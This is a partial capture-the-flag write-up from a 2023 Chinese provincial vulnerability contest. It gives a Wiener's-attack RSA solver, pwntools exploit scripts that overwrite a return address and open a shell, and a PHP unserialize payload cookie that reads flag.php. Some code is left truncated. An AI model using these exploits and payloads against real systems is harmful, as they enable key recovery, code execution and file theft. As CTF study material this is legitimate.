2023 Anhui Province “Vulnerability Excavation and Prevention” Finals – partial write-up

Undergraduate Group

1837

MTEgMTExIDAwMCAwMCAwMTExMSAwMDAgMDAxMCAwMDEgMTA

Base64-decode the string, then read the resulting groups of 0s and 1s as Morse code (0 = dot, 1 = dash).

flag{mosi1sfun}

rsa

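e is very large (about the same size as n), which suggests the private exponent d is small, so try Wiener's attack. The attack only works when d is below roughly n^(1/4) / 3; keys generated with a standard public exponent such as 65537 and a full-size d are not affected.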

import gmpy2
import libnum

def continuedFra(x, y):
    """Expand the fraction x / y into its continued-fraction terms.

    Runs the Euclidean algorithm and records every integer quotient.

    :param x: numerator
    :param y: denominator
    :return: list of partial quotients [a0, a1, ...]; empty when y is 0
    """
    quotients = []
    while y != 0:
        whole, remainder = divmod(x, y)
        quotients.append(whole)
        x, y = y, remainder
    return quotients
def gradualFra(cf):
    """Fold a list of continued-fraction terms into one convergent.

    The fold runs from the last term back to the first. Mind the order of the
    result: when the terms evaluate to the fraction P / Q, the tuple returned
    is (Q, P), i.e. the denominator of the convergent comes first.

    :param cf: list of continued-fraction terms
    :return: tuple (Q, P) for the convergent P / Q; (0, 1) for an empty list
    """
    low, high = 0, 1
    for term in reversed(cf):
        # Both values must be updated together, from the previous pair.
        low, high = high, term * high + low
    return low, high
def solve_pq(a, b, c):
    """Solve a*x^2 + b*x + c = 0 with the quadratic formula, in integers.

    Background (Vieta's theorem): p and q are the two roots of
    x^2 - (p + q)*x + p*q = 0, so knowing p + q and p*q is enough to get both.
    The square root and both divisions are floored, so the result is only
    meaningful when the caller verifies it (for example by multiplying the
    two values back together).

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: tuple of the two candidate roots
    """
    discriminant = b * b - 4 * a * c
    root = gmpy2.isqrt(discriminant)
    two_a = 2 * a
    return (-b + root) // two_a, (-b - root) // two_a
def getGradualFra(cf):
    """Compute the convergent of every non-empty prefix of the term list.

    :param cf: list of continued-fraction terms
    :return: list with one gradualFra() result per prefix cf[:1], cf[:2], ...
    """
    return [gradualFra(cf[:end]) for end in range(1, len(cf) + 1)]

def wienerAttack(e, n):
    """Search the convergents of e / n for a small RSA private exponent.

    Each convergent supplies a candidate pair (d, k) with e*d - 1 = k*phi.
    A candidate is accepted only when the phi it implies yields two numbers
    whose product is n. This succeeds only for keys whose private exponent is
    unusually small; the defence is to generate keys with a standard public
    exponent so that d is full size.

    :param e: RSA public exponent
    :param n: RSA modulus
    :return: private key d, or None when no convergent fits
    """
    terms = continuedFra(e, n)
    for d, k in getGradualFra(terms):
        # k must be a non-zero exact divisor of e*d - 1 for phi to be an integer.
        if k == 0 or (e * d - 1) % k != 0:
            continue
        phi = (e * d - 1) // k
        # n - phi + 1 equals p + q when phi is right; solve_pq then returns the
        # roots of x^2 + (p + q)*x + n, and only their product is checked.
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d
    return None
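# Challenge parameters. On the page each hex literal was broken by stray
# spaces (a syntax error); the pieces are joined here exactly where the spaces
# were. Compare against the original challenge file if decryption fails.
n = int(
    "1fb18fb44f4449f45ea938306c47b91f64b6c176bd24dbb35aa876f73859c90f0e1677d07430a1188176bc0b901ca7b01f6a99a7df3aec3dd41c3d80f0d"
    "17292e43940295b2aa0e8e5823ffcf9f5f448a289f2d3cb27366f907ee62d1aaeba490e892dc69dacbafa941ab7be809e1f882054e26add5892b1fcf4e9f1c443d93b"
    "f",
    16,
)
e = int(
    "e42a12145eaa816e2846200608080305c99468042450925789504307cbc54a20ed7071b68b067b703a1679d861795542f8cbd2d1cb4d3847d0940cac0"
    "18cdb0fa729571afbe10c1b8be2dd8acd99ee48b77d53c435b9c2fed59e12e02ad8cfc2bcc46ad85534c266dcc1f3a1a03d87118eaf3f5b3eeeb3be84ad023a4bf34939",
    16,
)
c = int(
    "d19d63015bdcb0b61824237b5c67cb2ef09af0c6cd30e193ff9683357b1e45ab4df607b8c1e0b96cafc49a84d7e655c3ce0f71b1d217eec9ca6cdfa57dd3dc92"
    "533b79431aa8a7d6ca67ac9cdd65b178a5a96ab7ce7bf88440f4a9b9d10151b0c942a42fdab9ea2c2f0c3706e9777c91dcc9bbdee4b0fb7f5d3001719c1dd3d3",
    16,
)

d = wienerAttack(e, n)
# wienerAttack() returns None when no convergent fits; stop with a clear
# message instead of failing inside pow().
if d is None:
    raise SystemExit("no small private exponent found for this key")
print(d)
m = pow(c, d, n)
print(libnum.n2s(m).decode())
#flag1sH3r3_d_ist0sma1l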

misc3

Two-question plaintext attack

CTF-Misc Essentials | JackHCC

Why can’t the original flag be handed in?

I can’t hand in the flag, ? Will there be a competition, flag crtl + c v v is not good? Get the answer right? Right understand?

Let’s make something to eat

#coding:utf-8
from pwn import *
from LibcSearcher import *
from sys import *
# pwntools session setup: verbose logging, tmux split for the debugger window,
# 64-bit Linux target.
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
context(arch='amd64', os='linux')
file = './food'
# A local process is always started here, even when the remote branch below
# replaces p afterwards.
p = process(file)
e = ELF(file)
rop = ROP(file)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
if args.R:
    # NOTE(review): 'n' with no port looks like a redacted placeholder for the
    # challenge host; this call cannot work as written.
    p = remote('n',)
    e = ELF(file)
    # Remote runs use the libc file shipped with the challenge instead of the
    # local system libc.
    libc = ELF('./libc-2.27.buu.so')

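# Short aliases around the pwntools tube `p`, used by the rest of the script.
# (The page defined uu32/uu64 twice with identical bodies; one copy is kept.)

# Log a variable by name. NOTE: the argument goes through eval(), so only call
# this with a variable name written in this script, never with received data.
lg = lambda s : log.success('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack a short byte string after zero-padding it to 4 / 8 bytes.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
# Send helpers: y is sent once prompt x has been received.
sla = lambda x,y : p.sendlineafter(x,y)
sa = lambda x,y : p.sendafter(x,y)
sl = lambda x : p.sendline(x)
s = lambda x : p.send(x)
# Receive helpers.
ru = lambda x : p.recvuntil(x)
r = lambda x : p.recv(x)
rl = lambda: p.recvline()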

# Module-level slots that cuos() fills in; all start at zero.
system = binsh = poprdi = ret = libc_base = 0
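def cuos(func, addr):
    """Derive libc-relative addresses from one known libc symbol address.

    Stores the results in the module globals libc_base, system, binsh,
    poprdi and ret, and logs each value.

    :param func: name of the libc symbol whose runtime address is known
    :param addr: runtime address of that symbol
    """
    global system, binsh, poprdi, ret, libc_base
    libc_base = addr - libc.sym[func]
    log.success('libc_base = ' + hex(libc_base))
    system = libc_base + libc.sym['system']
    log.success('system = ' + hex(system))
    binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
    log.success('binsh = ' + hex(binsh))
    poprdi = rop.find_gadget(['pop rdi','ret'])[0]
    log.success('poprdi = ' + hex(poprdi))
    ret = rop.find_gadget(['ret'])[0]
    # Fixed: this line printed poprdi under the "ret" label.
    log.success('ret = ' + hex(ret))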

def csu(text,edi,rsi,rdx,rip):
    """Pack the fixed sequence of 64-bit words used for the 0x400c40 gadget pair.

    The `text` argument is accepted but not used.

    :param edi: value placed in the r15 slot
    :param rsi: value placed in the r14 slot
    :param rdx: value placed in the r13 slot
    :param rip: value placed in the r12 slot
    :return: packed bytes, ending with seven zero words
    """
    words = [
        0x400c40 + 90,
        0,    # rbx
        1,    # rbp
        rip,  # r12
        rdx,  # r13
        rsi,  # r14
        edi,  # r15
        0x400c40 + 64,
    ]
    packed = b"".join(p64(word) for word in words)
    return packed + p64(0) * 7

def debug(cmd=''):
    """Attach gdb to the process behind `p`, passing `cmd` to gdb.attach()."""
    gdb.attach(p, cmd)
    # Left disabled by the author:
    #pause()
    #"b $rebase(0x10)"

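def add(index, size):
    """Pick menu entry 1 and answer its two prompts with `index` and `size`.

    The prompt strings on the page were split across lines (the newline
    escape was turned into a real line break); they are restored here.
    """
    sla('5.- Exit\n', '1')
    sla('the food\n', str(index))
    sla(' kcal.\n', str(size))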

def edit(index,des):

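Just a stack overflow: the "change number" option appears to accept an index without a bounds check, so single bytes can be written past the end of the array (indices 0x84–0x87 in the script below). On the program side the fix is to validate the index against the array length before writing.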

from pwn import *
from struct import pack
from ctypes import *
import hashlib

def s(a):
    """Send `a` on the tube `p` without appending a newline."""
    p.send(a)
def sa(a, b):
    """Wait until `a` has been received on `p`, then send `b`."""
    p.sendafter(a, b)
def sl(a):
    """Send `a` on the tube `p` as one line."""
    p.sendline(a)
def sla(a, b):
    """Wait until `a` has been received on `p`, then send `b` as one line."""
    p.sendlineafter(a, b)
def r():
    """Receive pending data from `p` and discard it (nothing is returned)."""
    p.recv()
def pr():
    """Receive pending data from `p` and print it."""
    received = p.recv()
    print(received)
def rl(a):
    """Receive from `p` up to and including the delimiter `a` and return it."""
    received = p.recvuntil(a)
    return received
def inter():
    """Hand the tube `p` over to the terminal for interactive use."""
    p.interactive()
def debug():
    """Attach gdb to the process behind `p`, then pause the script."""
    gdb.attach(p)
    # Hold the script here so the debugger can be set up first.
    pause()
def get_addr():
    """Read from `p` up to a 0x7f byte and unpack the last six bytes as an address.

    The six bytes are zero-padded to eight before unpacking with u64().
    """
    received = p.recvuntil(b'\x7f')
    tail = received[-6:]
    return u64(tail.ljust(8, b'\x00'))
def get_sb():
    """Return the addresses of system() and the "/bin/sh" string inside libc.

    Both are offsets from the global `libc_base`.
    NOTE(review): libc_base is not assigned anywhere in the visible script, so
    calling this as-is would presumably raise NameError.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr

# Session setup: start the local challenge binary and load the ELF files.
# NOTE(review): arch='amd64' is set here, but the breakpoint address in the
# commented gdb line further down (0x80488F2) looks like a 32-bit binary —
# confirm which one is right.
context(os='linux', arch='amd64', log_level='debug')
p = process('./pwn')
# Remote target left blank by the author.
#p = remote('', )
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

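# Answer the two start-up prompts with 1. The prompt literals on the page were
# split across lines (newline escape turned into a line break); restored here.
sla(b'have:\n', b'1')
sla(b'numbers\n', b'1')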

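def edit(idx, data):
    """Use menu entry 3 to set the number at position `idx` to `data`.

    The body had lost its indentation on the page and the prompt literals
    were split across lines; both are restored here.
    """
    sla(b'exit\n', b'3')
    sla(b'change:\n', str(idx))
    sla(b'number:\n', str(data))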

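# Four single-byte writes at indices 0x84..0x87. Read as one little-endian
# 32-bit value the bytes are 0x0804859b; presumably they land on the saved
# return address — TODO confirm against the binary. A bounds check on the
# index in the program would stop these writes.
edit(0x84, 0x9b)
edit(0x85, 0x85)
edit(0x86, 0x4)
edit(0x87, 0x8)

#gdb.attach(p, 'b *0x80488F2')

# Menu entry 5. The prompt literal was split across lines on the page; restored.
sla(b'exit\n', b'5')

#pause()
inter()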

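pop

The todos cookie is checked only against an unkeyed MD5 of its own contents and is then passed to unserialize(), so a client can supply its own serialized object (PHP object injection; "POP" stands for property-oriented programming). The fix is to sign the cookie with an HMAC under a server-side secret and to store the list as JSON rather than serialized PHP.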

<?php
header("content-type:text/html;charset=utf-8");
// Readme: converting an instance to a string returns the highlighted
// Readme.txt followed by the highlighted contents of whatever file $source
// names. Any code path that string-converts a Readme object therefore
// discloses that file.
class Readme{
      public $source;
        public function __toString()
              {
                      return highlight_file('Readme.txt', true).highlight_file($this->source, true);
                    }
}
// ?source=... shows this script's own source and stops.
if(isset($_GET['source'])){
      $s = new Readme();
        $s->source = __FILE__;
        echo $s;
          exit;
}
$todos = [];
// Load the todo list from the cookie: the first 32 characters are compared
// with md5() of the remainder.
// SECURITY: md5() without a secret is a checksum, not authentication — any
// client can compute it for data of its choosing. The data is then passed to
// unserialize(), which lets the client instantiate classes such as Readme
// with properties it controls (object injection). Safer: hash_hmac() with a
// server-side secret compared via hash_equals(), and json_decode() or
// unserialize($m, ['allowed_classes' => false]) for the payload.
// NOTE(review): the code that prints $todos is not shown on this page;
// presumably it echoes each entry, which would call __toString().
if(isset($_COOKIE['todos'])){
      $c = $_COOKIE['todos'];
        $h = substr($c, 0, 32);
        $m = substr($c, 32);
          if(md5($m) === $h){
                  $todos = unserialize($m);
                }
}
// Append the posted text, write the list back into the cookie with the same
// unkeyed md5 prefix, then redirect to the current URL.
if(isset($_POST['text'])){
      $todo = $_POST['text'];
        $todos[] = $todo;
        $m = serialize($todos);
          $h = md5($m);
          setcookie('todos', $h.$m);
            header('Location: '.$_SERVER['REQUEST_URI']);
            exit;
}
?>
GET /HTTP/1.1
Host: 1.1.2.100:1080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://1.1.2.100:1080
Connection: close
Referer: http://1.1.2.100:1080/
Cookie: todos=fae1710f5e51885bcf095e718ca752cca:1:{i:0;O:6:"readme":1:{s:6:"source";s:10:"./flag.php"; }}
Upgrade-Insecure-Requests: 1

text=1